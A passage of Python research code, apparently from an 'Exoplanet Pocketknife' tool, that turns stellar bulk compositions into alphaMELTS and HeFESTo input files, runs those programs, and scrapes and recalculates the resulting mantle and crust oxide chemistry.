in6 = ",{},{},{},{},{},{},{},{},{},{}".format(norm_feo, norm_na2o, norm_mgo, norm_al2o3,
norm_sio2, norm_cao, norm_tio2, norm_cr2o3, unnormalized_sum, norm_sum)
bsp_debug.write("{}\n{}\n".format(in6_header, in6))
bsp_comp = "{},{},{},{},{},{},{},{},{}".format(star_name, norm_feo, norm_na2o, norm_mgo, norm_al2o3,
norm_sio2, norm_cao, norm_tio2, norm_cr2o3)
bsp_chemfile.write("{}\n".format(bsp_comp))
# print(norm_feo)
# print(norm_sum)
#
# if norm_sum != 100.0:
# print("ERROR! NORMALIZED SUM IS NOT 100.0!")
# sys.exit()
title = "Title: {}".format(star_name)
bsp_feo = "Initial Composition: FeO {}".format(norm_feo)
bsp_na2o = "Initial Composition: Na2O {}".format(norm_na2o)
bsp_mgo = "Initial Composition: MgO {}".format(norm_mgo)
bsp_al2o3 = "Initial Composition: Al2O3 {}".format(norm_al2o3)
bsp_sio2 = "Initial Composition: SiO2 {}".format(norm_sio2)
bsp_cao = "Initial Composition: CaO {}".format(norm_cao)
bsp_tio2 = "Initial Composition: TiO2 {}".format(norm_tio2)
bsp_cr2o3 = "Initial Composition: Cr2O3 {}".format(norm_cr2o3)
init_temp = 'Initial Temperature: 2000'
final_temp = "Final Temperature: 800"
inc_temp = "Increment Temperature: -5"
init_press = "Initial Pressure: 10000"
final_press = "Final Pressure: 10000"
dpdt = "dp/dt: 0"
mode = "Mode: Fractionate Solids"
mode2 = "Mode: Isobaric"
melts_morb_input_file_vars = "{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}\n{}".format(
title,
bsp_feo, bsp_na2o, bsp_mgo, bsp_al2o3, bsp_sio2, bsp_cao, bsp_tio2, bsp_cr2o3,
init_temp, init_temp, final_temp, inc_temp, init_press, final_press, dpdt, mode, mode2)
morb_outfile = open("{}_MELTS_{}_INFILE.txt".format(star_name, "MORB"), 'w')
morb_outfile.write(melts_morb_input_file_vars)
morb_outfile.close()
fdir = os.getcwd() + "/{}_MELTS_{}_INFILE.txt".format(star_name, "MORB")
tdir = home_dir[0] + "/MELTS_MORB_Input_Files/{}_MELTS_{}_INFILE.txt".format(star_name, "MORB")
shutil.move(fdir, tdir)
except:
pass
bsp_debug.close()
bsp_chemfile.close()
hefestofilewriter_bsp(bulkfile=(home_dir[0] + "/{}_BSP_Composition.csv".format(infilename[:-4])), infilename=infilename)
runmelts_morb(infile_directory=(home_dir[0] + "/MELTS_MORB_Input_Files"), inputfilename=infilename[:-4])
def runmelts_morb(infile_directory, inputfilename):
if "{}_Completed_MORB_MELTS_Files".format(inputfilename) in os.listdir(os.getcwd()):
shutil.rmtree("{}_Completed_MORB_MELTS_Files".format(inputfilename))
os.mkdir("{}_Completed_MORB_MELTS_Files".format(inputfilename))
else:
os.mkdir("{}_Completed_MORB_MELTS_Files".format(inputfilename))
for i in os.listdir(infile_directory):
os.chdir(home_dir[0])
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
os.remove("alphaMELTS_tbl.txt")
else:
pass
shutil.copy((infile_directory + "/" + i), (home_dir[0] + "/" + i))
print("[~] Running MORB calculations for: {}".format(i[:-20]))
p = subprocess.Popen(["run_alphamelts.command", "-f", "MORB_Env_File"], stdin=subprocess.PIPE)
t = Timer(300, p.kill)
t.start()
print("\nTimeout timer started. 300 seconds until the loop continues...\n")
p.communicate(input=b"\n".join(
[b"1", i, b"8", b"alloy-liquid", b"0", b"x", b"5", b"3", b"+0.4", b"2", b"1400", b"10000", b"10", b"1",
b"3", b"1", b"liquid", b"1", b"0.05", b"0", b"10", b"0", b"4", b"0"]))
t.cancel()
if "alphaMELTS_tbl.txt" in os.listdir(os.getcwd()):
oldname = "alphaMELTS_tbl.txt"
newname = i[:-20] + "_MORB_OUTPUT"
os.rename(oldname, newname)
shutil.move(newname, home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename))
os.remove(i)
os.chdir(home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename))
csv_file_name = newname + ".csv"
with open(newname, 'rb') as infile, open(csv_file_name, 'wb') as outfile:
in_txt = csv.reader(infile, delimiter=" ")
out_csv = csv.writer(outfile)
out_csv.writerows(in_txt)
infile.close()
outfile.close()
os.remove(newname)
print("[~] {} MORB calculation processed!".format(i[:-17]))
else:
print("[X] {} MORB calculation FAILED!".format(i[:-20]))
pass
if i in home_dir[0]:
os.remove(home_dir[0] + "/{}".format(i))
else:
pass
scrapemorb(infiledirectory=(home_dir[0] + "/{}_Completed_MORB_MELTS_Files".format(inputfilename)), infilename=inputfilename)
def scrapebsp2(infiledirectory, inputfilename):
if "alloy_mass.csv" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/alloy_mass.csv")
else:
pass
alloy_mass_outfile = open(home_dir[0] + "/alloy_mass.csv", 'a')
alloy_mass_outfile.write("{},{}\n".format("star", "alloy mass"))
os.chdir(infiledirectory)
for i in os.listdir(os.getcwd()):
try:
os.chdir(infiledirectory)
if enumerate(i, 1) >= 100:
alloy_abundance = []
with open(i, 'r') as infile:
reader = csv.reader(infile)
row1 = next(reader)
star_name = row1[1]
alloy_abundance.append(star_name)
for num, line in enumerate(reader, 1):
if "Phase" in line:
csv_list = list(reader)
alloy_index = csv_list[0].index("alloy-solid_0")
for row in csv_list[1:]:
if not row == []:
a = row[alloy_index]
x = str(float(a))
alloy_abundance.append(x)
else:
break
else:
pass
os.chdir(home_dir[0])
# print(alloy_abundance[1:])
alloy_abundance_nums = []
for z in alloy_abundance[1:]:
alloy_abundance_nums.append(float(z))
alloy_abundance_sum = sum(alloy_abundance_nums)
print("Alloy abundance for {}: {}".format(alloy_abundance[0], alloy_abundance_sum))
alloy_mass_outfile.write("{},{}\n".format(alloy_abundance[0], alloy_abundance_sum))
except:
pass
else:
pass
def hefestofilewriter_bsp(bulkfile, infilename):
os.chdir(home_dir[0])
infilename = infilename[:-4]
if os.path.exists("{}_BSP_HeFESTo_Input_Files".format(infilename)):
shutil.rmtree("{}_BSP_HeFESTo_Input_Files".format(infilename))
else:
pass
os.mkdir("{}_BSP_HeFESTo_Input_Files".format(infilename))
bulkfile_df = pd.read_csv(bulkfile)
for row in bulkfile_df.index:
try:
star = bulkfile_df["Star"][row]
si = bulkfile_df["SiO2"][row]
mg = bulkfile_df["MgO"][row]
fe = bulkfile_df["FeO"][row]
ca = bulkfile_df["CaO"][row]
al = bulkfile_df["Al2O3"][row]
na = bulkfile_df["Na2O"][row]
hefesto_bsp_file = open("{}_BSP_HeFESTo_Infile.txt".format(star), 'a')
format_of_file = "0,20,80,1600,0,-2,0\n6,2,4,2\noxides\nSi {} 5.39386 0\nMg {} 2.71075 0\n" \
"Fe {} .79840 0\nCa {} .31431 0\nAl {} .96680 0\n" \
"Na {} .40654 0\n1,1,1\ninv251010\n47\nphase plg\n1\nan\nab\nphase sp\n0\nsp\nhc\n" \
"phase opx\n1\nen\nfs\nmgts\nodi\nphase c2c\n0\nmgc2\nfec2\nphase cpx\n1\ndi\nhe\ncen\ncats\njd\n" \
"phase gt\n0\npy\nal\ngr\nmgmj\njdmj\nphase cpv\n0\ncapv\nphase ol\n1\nfo\nfa\nphase wa\n0\nmgwa\nfewa\n" \
"phase ri\n0\nmgri\nferi\nphase il\n0\nmgil\nfeil\nco\nphase pv\n0\nmgpv\nfepv\nalpv\nphase ppv\n0\nmppv\n" \
"fppv\nappv\nphase cf\n0\nmgcf\nfecf\nnacf\nphase mw\n0\npe\nwu\nphase qtz\n1\nqtz\nphase coes\n0\ncoes\n" \
"phase st\n0\nst\nphase apbo\n0\napbo\nphase ky\n0\nky\nphase neph\n0\nneph".format(si,
mg, fe, ca, al, na)
hefesto_bsp_file.write(format_of_file)
hefesto_bsp_file.close()
fdir = home_dir[0] + "/{}".format("{}_BSP_HeFESTo_Infile.txt".format(star))
tdir = home_dir[0] + "/{}/{}".format("{}_BSP_HeFESTo_Input_Files".format(infilename),
"{}_BSP_HeFESTo_Infile.txt".format(star))
shutil.move(fdir, tdir)
except:
pass
print("\n[~] BSP HeFESTo input files available in '{}'".format("{}_BSP_HeFESTo_Input_Files".format(infilename)))
def hefestofilewriter_morb(bulkfile, infilename):
os.chdir(home_dir[0])
if os.path.exists("{}_MORB_HeFESTo_Input_Files".format(infilename)):
shutil.rmtree("{}_MORB_HeFESTo_Input_Files".format(infilename))
else:
pass
os.mkdir("{}_MORB_HeFESTo_Input_Files".format(infilename))
bulkfile_df = pd.read_csv(bulkfile)
for row in bulkfile_df.index:
try:
star = bulkfile_df["Star"][row]
si = bulkfile_df["SiO2"][row]
mg = bulkfile_df["MgO"][row]
fe = bulkfile_df["FeO"][row]
ca = bulkfile_df["CaO"][row]
al = bulkfile_df["Al2O3"][row]
na = bulkfile_df["Na2O"][row]
hefesto_morb_file = open("{}_MORB_HeFESTo_Infile.txt".format(star), 'a')
format_of_file = "0,20,80,1200,0,-2,0\n6,2,4,2\noxides\nSi {} 5.33159 0\n" \
"Mg {} 1.37685 0\nFe {} .55527 0\n" \
"Ca {} 1.33440 0\nAl {} 1.82602 0\n" \
"Na {} 0.71860 0\n1,1,1\ninv251010\n47\nphase plg\n1\nan\nab\nphase sp\n0\nsp\n" \
"hc\nphase opx\n1\nen\nfs\nmgts\nodi\nphase c2c\n0\nmgc2\nfec2\nphase cpx\n1\ndi\nhe\ncen\ncats\n" \
"jd\nphase gt\n0\npy\nal\ngr\nmgmj\njdmj\nphase cpv\n0\ncapv\nphase ol\n1\nfo\nfa\nphase wa\n0\n" \
"mgwa\nfewa\nphase ri\n0\nmgri\nferi\nphase il\n0\nmgil\nfeil\nco\nphase pv\n0\nmgpv\nfepv\nalpv\n" \
"phase ppv\n0\nmppv\nfppv\nappv\nphase cf\n0\nmgcf\nfecf\nnacf\nphase mw\n0\npe\nwu\nphase qtz\n" \
"1\nqtz\nphase coes\n0\ncoes\nphase st\n0\nst\nphase apbo\n0\napbo\nphase ky\n0\nky\nphase neph\n" \
"0\nneph".format(si, mg, fe, ca, al, na)
hefesto_morb_file.write(format_of_file)
hefesto_morb_file.close()
fdir = home_dir[0] + "/{}".format("{}_MORB_HeFESTo_Infile.txt".format(star))
tdir = home_dir[0] + "/{}/{}".format("{}_MORB_HeFESTo_Input_Files".format(infilename),
"{}_MORB_HeFESTo_Infile.txt".format(star))
shutil.move(fdir, tdir)
except:
pass
print("\n[~] Crust HeFESTo input files available in '{}'".format("{}_MORB_HeFESTo_Input_Files".format(infilename)))
consol_hefestofolders(infilename=infilename)
def consol_hefestofolders(infilename):
print('\n[~] Consolidating HeFESTo input file folders...')
bsp_folder = "/{}_BSP_HeFESTo_Input_Files".format(infilename)
morb_folder = "/{}_MORB_HeFESTo_Input_Files".format(infilename)
print("[~] Got HeFESTo BSP folder '{}'".format(bsp_folder))
print("[~] Got HeFESTo Crust folder '{}'".format(morb_folder))
if "{}_HeFESTo_Input_Files".format(infilename) in os.listdir(os.getcwd()):
shutil.rmtree("{}_HeFESTo_Input_Files".format(infilename))
else:
pass
consol_folder = (home_dir[0] + "/{}_HeFESTo_Input_Files".format(infilename))
print("\n[~] Created consolidated HeFESTo input file folder: {}".format(consol_folder))
fdir_bsp = (home_dir[0] + bsp_folder)
fdir_morb = (home_dir[0] + morb_folder)
tdir_bsp = consol_folder + bsp_folder
tdir_morb = consol_folder + morb_folder
shutil.move(fdir_bsp, tdir_bsp)
shutil.move(fdir_morb, tdir_morb)
print("\n[~] HeFESTo Input files are now available in {} for transfer to a HeFESTo VM".format(consol_folder))
print("\n[~] Please move this script and folder '{}' to a working HeFESTo directory!".format(consol_folder))
print("[~] Exiting the Exoplanet Pocketknife's active processes...")
time.sleep(6)
initialization()
def runhefesto(infiledir, actual_run, runname):
os.chdir(home_dir[0])
if actual_run is True:
# try:
if 'main' not in os.listdir(os.getcwd()):
print("[X] ERROR! HeFESTo's 'main' not detected in the working directory!\n")
time.sleep(4)
initialization()
else:
print("[~] HeFESTo detected in the working directory!\n")
pass
# os.chdir(home_dir[0])
# print("\nPlease enter the name of your BSP HeFESTo input .csv sheet:")
# hefesto_input_bsp = input(">>> ")
# if hefesto_input_bsp in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input_bsp))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input_bsp))
# time.sleep(4)
# initialization()
# print("\nPlease enter the name of your crust HeFESTo input .csv sheet:")
# hefesto_input_morb = input(">>> ")
# if hefesto_input_morb in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input_morb))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input_morb))
# time.sleep(4)
# initialization()
#
# if os.path.exists("HeFESTo_BSP_Input_Files"):
# shutil.rmtree("HeFESTo_BSP_Input_Files")
# else:
# pass
# if os.path.exists("HeFESTo_MORB_Input_Files"):
# shutil.rmtree("HeFESTo_MORB_Input_Files")
# else:
# pass
#
# os.mkdir("HeFESTo_BSP_Input_Files")
if os.path.exists(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname)):
shutil.rmtree(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname))
else:
pass
if os.path.exists(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname)):
shutil.rmtree(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname))
else:
pass
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.66".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.58".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.59".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.66".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.58".format(runname))
os.mkdir(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.59".format(runname))
bsp_dir = []
morb_dir = []
os.chdir(infiledir)
for i in os.listdir(os.getcwd()):
if "BSP" in i or "bsp" in i:
print("[~] Found BSP directory: {}".format(i))
bsp_dir.append(i)
elif "MORB" in i or "morb" in i:
print("[~] Found MORB directory: {}".format(i))
morb_dir.append(i)
# else:
# print("\n[X] HeFESTo cumulative input directory not properly formatted!")
# initialization()
if len(bsp_dir) > 1 or len(morb_dir) > 1:
print("\n[X] HeFESTo cumulative input directory not properly formatted!")
time.sleep(2)
initialization()
bsp_dir = home_dir[0] + "/{}/{}".format(infiledir, bsp_dir[0])
morb_dir = home_dir[0] + "/{}/{}".format(infiledir, morb_dir[0])
print("\b[~] Initiating HeFESTo BSP calculations...")
for i in os.listdir(bsp_dir):
star_name = i[:-23]
os.chdir(home_dir[0])
if "fort.66" in os.listdir(os.getcwd()):
try:
os.remove("fort.66")
except:
pass
try:
shutil.rmtree("fort.66")
except:
pass
else:
pass
if "fort.58" in os.listdir(os.getcwd()):
try:
os.remove("fort.58")
except:
pass
try:
shutil.rmtree("fort.58")
except:
pass
else:
pass
if "fort.59" in os.listdir(os.getcwd()):
try:
os.remove("fort.59")
except:
pass
try:
shutil.rmtree("fort.59")
except:
pass
else:
pass
if "control" in os.listdir(os.getcwd()):
try:
os.remove("control")
except:
pass
try:
shutil.rmtree("control")
except:
pass
else:
pass
os.chdir(bsp_dir)
shutil.copy((bsp_dir + "/{}".format(i)), (home_dir[0] + "/{}".format("control")))
print("\n[~] Performing HeFESTo BSP calculations on: {}".format(i))
os.chdir(home_dir[0])
argz = (home_dir[0] + "/main")
p = subprocess.Popen(argz, stdin=None, stdout=None)
t = Timer(800, p.kill)
t.start()
p.communicate()
t.cancel()
if "fort.66" in os.listdir(os.getcwd()):
print("\n[~] 'fort.66' found!")
shutil.move("fort.66", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.66/{}".format(runname, star_name + "_fort66")))
if "fort.58" in os.listdir(os.getcwd()):
print("\n[~] 'fort.58' found!")
shutil.move("fort.58", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.58/{}".format(runname, star_name + "_fort58")))
if "fort.59" in os.listdir(os.getcwd()):
print("\n[~] 'fort.59' found!")
shutil.move("fort.59", (home_dir[0] + "/{}_HeFESTo_BSP_Output_Files/fort.59/{}".format(runname, star_name + "_fort59")))
if "control" in os.listdir(os.getcwd()):
os.remove("control")
time.sleep(2)
print("\b[~] Initiating HeFESTo crust calculations...")
for i in os.listdir(morb_dir):
star_name = i[:-24]
os.chdir(home_dir[0])
if "fort.66" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.66")
if "fort.58" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.58")
if "fort.59" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/fort.59")
if "control" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/control")
os.chdir(morb_dir)
shutil.copy((morb_dir + "/{}".format(i)), (home_dir[0] + "/{}".format("control")))
print("\n[~] Performing HeFESTo crust calculations on: {}".format(i))
os.chdir(home_dir[0])
argz = (home_dir[0] + "/main")
p = subprocess.Popen(argz, stdin=None, stdout=None)
t = Timer(800, p.kill)
t.start()
p.communicate()
t.cancel()
try:
if "fort.66" in os.listdir(home_dir[0]):
print("\n[~] 'fort.66; found!")
shutil.move(home_dir[0] + "/fort.66", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.66/{}".format(runname, star_name + "_fort66")))
if "fort.58" in os.listdir(home_dir[0]):
print("\n[~] 'fort.58' found!")
shutil.move(home_dir[0] + "/fort.58", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.58/{}".format(runname, star_name + "_fort58")))
if "fort.59" in os.listdir(home_dir[0]):
print("\n[~] 'fort.59 found!")
shutil.move(home_dir[0] + "/fort.59", (home_dir[0] + "/{}_HeFESTo_MORB_Output_Files/fort.59/{}".format(runname, star_name + "_fort59")))
if "control" in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/control")
except:
pass
os.chdir(home_dir[0])
if "fort.66" in os.listdir(os.getcwd()):
os.remove("fort.66")
if "fort.58" in os.listdir(os.getcwd()):
os.remove("fort.58")
if "fort.66" in os.listdir(os.getcwd()):
os.remove("fort.69")
if "control" in os.listdir(os.getcwd()):
os.remove("control")
if os.path.exists("{}_HeFESTo_Output_Files".format(runname)):
shutil.rmtree("{}_HeFESTo_Output_Files".format(runname))
os.mkdir("{}_HeFESTo_Output_Files".format(runname))
shutil.move(home_dir[0] + "/{}_HeFESTo_BSP_Output_Files".format(runname), home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname))
shutil.move(home_dir[0] + "/{}_HeFESTo_MORB_Output_Files".format(runname), home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname))
print("\n[~] HeFESTo Output Files available at '{}'".format(home_dir[0] + "/{}_HeFESTo_Output_Files".format(runname)))
print("\n[~] Finished with HeFESTo calculations!")
# bsp_infile_init = (home_dir[0] + "/{}".format(hefesto_input_bsp))
# bsp_infile_to = (home_dir[0] + "/HeFESTo_BSP_Input_Files/{}".format(hefesto_input_bsp))
# morb_infile_init = (home_dir[0] + "/{}".format(hefesto_input_morb))
# morb_infile_to = (home_dir[0] + "/HeFESTo_MORB_Input_Files/{}".format(hefesto_input_morb))
# shutil.copy(bsp_infile_init, bsp_infile_to)
# shutil.copy(morb_infile_init, morb_infile_to)
# os.chdir(bsp_dir)
# with open(hefesto_input_bsp, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_BSP_nput.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# output_file.close()
#
# os.chdir(home_dir[0] + "/HeFESTo_MORB_Input_Files")
# with open(hefesto_input_morb, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_MORB_Input.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# output_file.close()
# print("[~] HeFESTo files written!\n"
# "Please see {} for your files!\n".format(os.getcwd()))
# except:
# pass
# os.chdir(home_dir[0] + "/HeFESTo_BSP_Input_Files")
# print("[~] Launching HeFESTo simulations...")
# # curr_planet = ""
# # for i in os.listdir(os.getcwd()):
# # curr_planet.update(i)
# # print("[~] Currently simulating BSP for: {}".format(curr_planet.get()))
#
#
#
# else:
# try:
# if os.path.exists(home_dir[0] + "/HeFESTo_Inputs"):
# shutil.rmtree(home_dir[0] + "/HeFESTo_Inputs")
# else:
# pass
# os.mkdir(home_dir[0] + "/HeFESTo_Inputs")
# os.chdir(home_dir[0])
# print("\nPlease enter the name of your HeFESTo input .csv sheet:")
# hefesto_input = input(">>> ")
# if hefesto_input in os.listdir(os.getcwd()):
# print("[~] {} has been found in the working directory!".format(hefesto_input))
# else:
# print("[X] {} has NOT been found in the working directory!".format(hefesto_input))
# time.sleep(4)
# initialization()
#
# infile_init = (home_dir[0] + "/{}".format(hefesto_input))
# infile_to = (home_dir[0] + "/HeFESTo_Inputs/{}".format(hefesto_input))
# shutil.copy(infile_init, infile_to)
#
# os.chdir(home_dir[0] + "/HeFESTo_Inputs")
# with open(hefesto_input, 'r') as infile:
# reader = csv.reader(infile, delimiter=",")
# for row in reader:
# list_formatted = []
# for z in row:
# list_formatted.append(z)
# title = list_formatted[0].strip()
# output_file = open("{}_HeFESTo_Input.txt".format(title), 'a')
# for z in list_formatted[1:]:
# output_file.write("{}\n".format(z))
# # if z.isalpha() == True:
# # output_file.write("{}\n".format(z))
# # else:
# # output_file.write("{}\n".format(z))
# output_file.close()
# print("[~] HeFESTo files written!\n"
# "Please see {} for your files!\n".format(os.getcwd()))
# except:
# pass
def scrapemorb(infiledirectory, infilename):
if "{}_MORB_Consolidated_Chem_File".format(infilename) in os.listdir(home_dir[0]):
os.remove(home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename))
else:
pass
morb_outfile = open((home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename)), 'a') # need a header
morb_outfile_header = "Star Name,Pressure,Temperature,mass,SiO2,TiO2,Al2O3,Fe2O3,Cr2O3,FeO,MgO,CaO,Na2O\n"
morb_outfile.write(morb_outfile_header)
for i in os.listdir(infiledirectory):
try:
print("\n[~] Scraping MORB output file: {}".format(i))
os.chdir(infiledirectory)
with open(i, 'r') as infile:
star_name = []
data = []
reader = csv.reader(infile, delimiter=',')
reader2 = list(reader)
star_name.append(reader2[0][1])
if enumerate(i, 1) >= 100:
for num, line in enumerate(reader2, 1):
if "Liquid" in line:
skip_row2 = num + 1
liquid_comp = reader2[skip_row2]
for item in liquid_comp:
data.append(item)
else:
pass
data_formatted = ",".join(str(z) for z in data)
os.chdir(home_dir[0])
morb_outfile.write("{},{}\n".format(star_name[0], data_formatted))
else:
os.chdir(home_dir[0])
morb_outfile.write("{},ERROR!\n".format(star_name[0]))
except:
pass
morb_outfile.close()
os.chdir(home_dir[0])
consol_file = (home_dir[0] + "/{}_MORB_Consolidated_Chem_File".format(infilename))
morbrecalc(infiledirectory=infiledirectory, infilename=infilename, bulkfilename=consol_file)
def morbrecalc(infiledirectory, infilename, bulkfilename):
os.chdir(home_dir[0])
if "{}_MORB_Recalc_Bulkfile.csv".format(infilename) in os.listdir(os.getcwd()):
os.remove("{}_MORB_Recalc_Bulkfile.csv".format(infilename))
else:
pass
if "morb_debug.csv" in os.listdir(os.getcwd()):
os.remove("morb_debug.csv")
morb_debug = open("morb_debug.csv", 'a')
morb_recalc_outfile = open("{}_MORB_Recalc_Bulkfile.csv".format(infilename), 'a')
morb_recalc_outfile_header = "Star,Pressure,Temperature,Mass,SiO2,TiO2,Al2O3,Cr2O3,FeO,MgO,CaO,Na2O,SUM\n"
morb_recalc_outfile.write(morb_recalc_outfile_header)
df_morb_chem = pd.read_csv(bulkfilename)
for row in df_morb_chem.index:
try:
star_name = df_morb_chem["Star Name"][row]
pressure = float(df_morb_chem["Pressure"][row])
temperature = float(df_morb_chem["Temperature"][row])
mass = float(df_morb_chem["mass"][row])
sio2_in = float(df_morb_chem["SiO2"][row])
tio2_in = float(df_morb_chem["TiO2"][row])
al2o3_in = float(df_morb_chem["Al2O3"][row])
fe2o3_in = float(df_morb_chem["Fe2O3"][row])
cr2o3_in = float(df_morb_chem["Cr2O3"][row])
feo_in = float(df_morb_chem["FeO"][row])
mgo_in = float(df_morb_chem["MgO"][row])
cao_in = float(df_morb_chem["CaO"][row])
na2o_in = float(df_morb_chem["Na2O"][row])
chem_in_sum = (sio2_in + tio2_in + al2o3_in + fe2o3_in + cr2o3_in + feo_in + mgo_in + cao_in + na2o_in)
md1_header = "1,sio2,tio2,al2o3,fe2o3,cr2o3,cr2o3,feo,mgo,cao,na2o"
md1 = ",{},{},{},{},{},{},{},{},{}".format(sio2_in, tio2_in, al2o3_in, fe2o3_in,
cr2o3_in, feo_in, mgo_in, cao_in, na2o_in)
morb_debug.write("{}\n{}\n".format(md1_header, md1))
wt_sio2_in = (sio2_in/100.0) * mass
wt_tio2_in = (tio2_in / 100.0) * mass
wt_al2o3_in = (al2o3_in / 100.0) * mass
wt_fe2o3_in = (fe2o3_in / 100.0) * mass
wt_cr2o3_in = (cr2o3_in / 100.0) * mass
wt_feo_in = (feo_in / 100.0) * mass
wt_mgo_in = (mgo_in / 100.0) * mass
wt_cao_in = (cao_in / 100.0) * mass
wt_na2o_in = (na2o_in / 100.0) * mass
sum_wt_in = (wt_sio2_in + wt_tio2_in + wt_al2o3_in + wt_fe2o3_in + wt_cr2o3_in + wt_feo_in +
wt_mgo_in + wt_cao_in + wt_na2o_in)
md2_header = "2,sio2,tio2,al2o3,fe2o3,cr2o3,feo,mgo,cao,na2o"
md2 = ",{},{},{},{},{},{},{},{},{}".format(wt_sio2_in, wt_tio2_in, wt_al2o3_in, wt_fe2o3_in,
wt_cr2o3_in, wt_feo_in, wt_mgo_in, wt_cao_in, wt_na2o_in)
morb_debug.write("{}\n{}\n".format(md2_header, md2))
sio2_moles = wt_sio2_in / sio2_molwt
tio2_moles = wt_tio2_in / tio2_molwt
al2o3_moles = wt_al2o3_in / al2o3_molwt
fe2o3_moles = wt_fe2o3_in / fe2o3_molwt
cr2o3_moles = wt_cr2o3_in / cr2o3_molwt
feo_moles = wt_feo_in / feo_molwt
mgo_moles = wt_mgo_in / mgo_molwt
cao_moles = wt_cao_in / cao_molwt
na2o_moles = wt_na2o_in / na2o_molwt
sum_oxide_moles = (sio2_moles + tio2_moles + al2o3_moles + fe2o3_moles + cr2o3_moles + feo_moles +
mgo_moles + cao_moles + na2o_moles)
md3_header = "3,sio2,tio2,al2o3,fe2o3,feo,mgo,cao,na2o"
md3 = ",{},{},{},{},{},{},{},{},{}".format(sio2_moles, tio2_moles, al2o3_moles, fe2o3_moles,
cr2o3_moles, feo_moles, mgo_moles, cao_moles, na2o_moles)
morb_debug.write("{}\n{}\n".format(md3_header, md3))
si_cations = sio2_moles * num_sio2_cations
ti_cations = tio2_moles * num_tio2_cations
al_cations = al2o3_moles * num_al2o3_cations
fe_fe2o3_cations = fe2o3_moles * num_fe2o3_cations
cr_cations = cr2o3_moles * num_cr2o3_cations
fe_feo_cations = feo_moles * num_feo_cations
mg_cations = mgo_moles * num_mgo_cations
ca_cations = cao_moles * num_cao_cations
na_cations = na2o_moles * num_na2o_cations
sum_cations = (si_cations + ti_cations + al_cations + fe_fe2o3_cations + cr_cations + fe_feo_cations + mg_cations +
ca_cations + na_cations)
md4_header = "4,si,ti,al,fe,cr,fe,mg,ca,na,sum"
md4 = ",{},{},{},{},{},{},{},{},{},{}".format(si_cations, ti_cations, al_cations, fe_fe2o3_cations, cr_cations,
fe_feo_cations, mg_cations, na_cations, na_cations, sum_cations)
morb_debug.write("{}\n{}\n".format(md4_header, md4))
# fe2o3 --> feo recalc
total_mol_fe = (fe_feo_cations + fe_fe2o3_cations)
total_wt_fe = total_mol_fe * fe_atwt
total_wt_feo = total_mol_fe * feo_molwt
md5_header = "5,total_mol_fe,total_wt_fe,total_wt_feo"
md5 = ",{},{},{}".format(total_mol_fe, total_wt_fe, total_wt_feo)
morb_debug.write("{}\n{}\n".format(md5_header, md5))
# unnormalized wt%
unnorm_sum = (wt_sio2_in + wt_tio2_in + wt_al2o3_in + total_wt_feo +
wt_cr2o3_in + wt_mgo_in + wt_cao_in + wt_na2o_in)
# normalized oxide wt% w/o mgo fix
norm_wt_sio2 = wt_sio2_in / unnorm_sum
norm_wt_tio2 = wt_tio2_in / unnorm_sum
norm_wt_al2o3 = wt_al2o3_in / unnorm_sum
norm_wt_feo = total_wt_feo / unnorm_sum
norm_wt_cr2o3 = wt_cr2o3_in / unnorm_sum
norm_wt_mgo = wt_mgo_in / unnorm_sum
norm_wt_cao = wt_cao_in / unnorm_sum
norm_wt_na2o = wt_na2o_in / unnorm_sum
norm_sum_nomgofix = (norm_wt_sio2 + norm_wt_tio2 + norm_wt_al2o3 + norm_wt_feo + norm_wt_cr2o3 + norm_wt_mgo +
norm_wt_cao + norm_wt_na2o)
md6_header = "6,sio2,tio2,al2o3,feo,cr2o3,mgo,cao,na2o,sum"
md6 = ",{},{},{},{},{},{},{},{},{}".format(norm_wt_sio2, norm_wt_tio2, norm_wt_al2o3,
